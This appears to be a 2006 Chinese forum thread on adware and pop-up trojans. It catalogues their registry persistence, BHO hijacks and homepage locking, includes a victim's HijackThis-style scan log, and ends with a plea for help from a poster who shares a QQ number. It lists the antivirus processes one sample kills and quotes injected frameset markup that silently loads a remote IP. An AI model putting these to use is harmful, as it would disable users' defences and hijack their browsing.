现在的IE广告、弹窗、QQ消息等愈演愈烈，应该要好好诊治这个现象了2006-11-08 14:13案例列举部分行为：

QQ消息
WinDir\rundll.exe
WinDir\killme.bat
Software\Microsoft\Windows\CurrentVersion\Run

开机弹窗
WinDir\csrss.exe
WinDir\killme.bat
Software\Microsoft\Windows\CurrentVersion\Run
创建链接快捷方式到收藏夹
USERPROFILE\Favorites\url [InternetShortcut]
设置主页
Software\Microsoft\Internet Explorer\Main\
Start Page
Software\Policies\Microsoft\Internet Explorer\Policies\Microsoft\Internet Explorer\Control Panel\
HomPage禁用主页修改属性

自动点广告
WinDir\services.exe
WinDir\killme.bat
Software\Microsoft\Windows\CurrentVersion\Run
创建链接快捷方式到收藏夹
USERPROFILE\Favorites\url [InternetShortcut]

超级开机弹窗popwin
添加服务
“为系统提供加速启动功能”
delme.bat
Software\Microsoft\Windows\CurrentVersion\Run\
终止以下安全软件服务（进程）
qqkav agentsvr frogagent kvxp kvsrvxp kregex trojdie kvcenter kvmon uihost KVSrvXP_1 KVSrvXP KvXP KVMonXP vsmon vptray rtvscan Navap Norton Symantec webscanx vsstat vshwin32 alogserv avsynmgr avconsol Iparmor KWatch KPfwSvc KMailMon KavPFW KAVStart KAVSvc KULANSyn KPopMon KWatchUI KAVPlus rfwsrv RAVMON rfwmain RAVTIMER RAV.exe RavStub Ravmond CCENTER RsCCenter SharedAccess

IE广告
主要是添加了BHO
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
HKCR\CLSID\
HKCR\
对应的BHO名及CLSID，在CLSID处设置了键值守护
注册BHO组件iebhook.dll（iebhook.dll.dll）
注：有些是加壳下载的，与上面行为类似，添加规则突破AVP主动防御、主动防护技术

------------------------------------------------------------------

ShellExecuteHooks也是比较难缠的

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks

最近的Ad1.exe（假QQ迷你首页&37ss.com/index20.htm）更是替换掉了系统服务文件

------------------------------------------------------------

现在的IE广告、弹窗、QQ消息等，用的技术越来越接近病毒了，愈来愈扰乱人们的视线了，还带来了木马下载，真是可恨。。。。。。

找找相似的案例吧:-)

原贴：http://hi.baidu.com/killvir/blog/item/06176c81202d52d8bc3e1eb4.html

可疑文件压缩档加密码virus

newvirus@cisrt.com

呵呵，搞个沙发顶一顶

支持以下...辛苦``

希望有法律来制裁~~~我最近几个月我经常中广告木马病毒

对，应该用法律来制裁

郁闷

我的病毒日记`有这个现象`杀不了Logfile of Kaka v2. 0. 2. 1 Scan Module v1. 0. 0. 40
Scan saved at 20:04:10, on 2006-11-17
Platform: Microsoft Windows XP Professional Service Pack 2 (Build 2600)
MSIE: Internet Explorer v6.00 SP2; (6.00.2900.2180 (xpsp_sp2_rtm.040803-2158))


R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINDOWS\system32\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page=%SystemRoot%\system32\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page=http://www.ali213.com
R3 - URLSearchHook: Tencent SearchHook - {DB8B2393-7A6C-4C76-88CE-6B1F6FF6FFE9} - C:\Program Files\TENCENT\Adplus\SSAddr.dll
O1 - Hosts: 127.0.0.1      localhost
O2 - BHO: WebThunder Browser Helper - {00000AAA-A363-466E-BEF5-9BB68697AA7F} - D:\xunlei\WebThunderBHO_015.dll
O2 - BHO: Tencent Browser Helper - {0C7C23EF-A848-485B-873C-0ED954731014} - C:\Program Files\TENCENT\Adplus\SSAddr.dll
O2 - BHO:  - {385AB8C6-FB22-4D17-8834-064E2BA0A6F0} -  (file missing)
O2 - BHO: QQBrowserHelperObject Class - {54EBD53A-9BC1-480B-966A-843A333CA162} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O2 - BHO:  - {669751ED-D558-49AE-B01A-3B374CC7910E} - C:\WINDOWS\system32\ssup.dll
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRA~1\FLASHGET\jccatch.dll
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\fgiebar.dll
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINDOWS\system32\KakaTool.dll
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [RfwMain] "C:\Program Files\Rising\Rfw\rfwmain.exe" -Startup
O4 - HKLM\..\Run: [WebThunder] D:\xunlei\WebThunder.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKLM\..\Run: [miniqqlive] "C:\Program Files\Tencent\QQLive\MiniQQLive.exe"
O4 - HKLM\..\Run: [stup.exe] C:\PROGRA~1\TENCENT\Adplus\stup.exe
O4 - HKLM\..\Run: [coopen] C:\Program Files\coopen\coopen.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tdsetup.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tdsetup.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook096.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook096.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmdm_setup_2.1_110.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmdm_setup_2.1_110.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook029.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook029.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bind_40254.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bind_40254.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setup133.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setup133.exe
O4 - HKLM\..\RunOnce: [RavStub] "C:\Program Files\Rising\Rav\ravstub.exe" /RUNONCE
O4 - HKLM\..\RunOnce: [KKDelay] C:\Program Files\Rising\KakaToolBar\RunOnce.exe
O4 - Startup: desktop.ini =
O4 - Startup: 腾讯QQ.lnk = C:\Program Files\Tencent\QQ\QQ.exe
O4 - Global Startup: desktop.ini =
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: 上传到QQ网络硬盘 - C:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 上傳到QQ網路硬碟 - C:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 使用Web迅雷下载 - D:\xunlei\GetUrl.htm
O8 - Extra context menu item: 使用Web迅雷下载全部链接 - D:\xunlei\GetAllUrl.htm
O8 - Extra context menu item: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: 导出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: 新增到QQ自定義面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 新增到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 添加到QQ自定义面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - C:\Program Files\Tencent\QQ\SendMMS.htm
O9 - Extra Button: 启动Web迅雷 - {962EFB8E-2683-42d4-AC74-AAA4C759B9C6} - http://my.xunlei.com (file missing)
O9 - Extra 'Tools' menuitem: 启动Web迅雷 - {962EFB8E-2683-42d4-AC74-AAA4C759B9C6} - http://my.xunlei.com (file missing)
O9 - Extra Button: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - C:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra 'Tools' menuitem: 腾讯QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - C:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra Button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\flashget.exe
O9 - Extra Button: (no name) - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O9 - Extra 'Tools' menuitem: QQ炫彩工具条设置 - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra Button: 访问瑞星网站 - {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} - http://www.rising.com.cn (file missing)
O9 - Extra Button: 访问卡卡社区 - {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} - http://www.ikaka.com (file missing)
O10 - Unknown file in Winsock LSP: C:\WINDOWS\system32\cdnns.dll
O11 - Options group: [TBH] 中文搜搜
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
O18 - Filter : application/octet-stream - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\WINDOWS\system32\mscoree.dll
O18 - Filter : application/x-complus - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\WINDOWS\system32\mscoree.dll
O18 - Filter : application/x-msdownload - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\WINDOWS\system32\mscoree.dll
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: file - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll
O23 - Service: AVG Anti-Spyware Guard (AVG Anti-Spyware Guard) - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: Human Interface Device Access (HidServ) -  - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwproxy.exe
O23 - Service: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwsrv.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - "C:\Program Files\Rising\Rav\CCenter.exe"
O23 - Service: Rising RealTime Monitor (RsRavMon) - Beijing Rising Technology Co., Ltd. - "C:\Program Files\Rising\Rav\Ravmond.exe"
O23 - Service: User Privilege Service (usprserv) - Microsoft Corporation - C:\WINDOWS\system32\svchost.exe -k netsvcs

请问浏览器打开(如http://www.xxx.com/index.asp)网站,查看源文件时,都会显示以下代码是怎么回事.包括YAHOO等大网站.它只控制含有http://www.xxx.com/index.asp

<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://220.167.29.103:9123/ndatin.aspx?param=ABdXNlcm5hbWU9Z2EyMjQyNTg3JnBvbGljeWlkPTM=&ref=1'><frame id ='frmOLD' name='frmOLD' src='http://yahoo.com.cn/?'></frameset></HTML>

比如浏览http://www.gahn520.com/xinban/index.asp网站,查看源文件显示
<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://220.167.29.103:9123/ndatin.aspx?param=ABdXNlcm5hbWU9Z2EyMjQyNTg3JnBvbGljeWlkPTM=&ref=1'><frame id ='frmOLD' name='frmOLD' src=http://www.gahn520.com/xinban/?'></frameset></HTML>

是不是我中病毒了啊,为什么瑞星也杀不到毒........?????还是中了YAHOO的流氓软件.IE被刮改了.

我的QQ 6706682  求救啊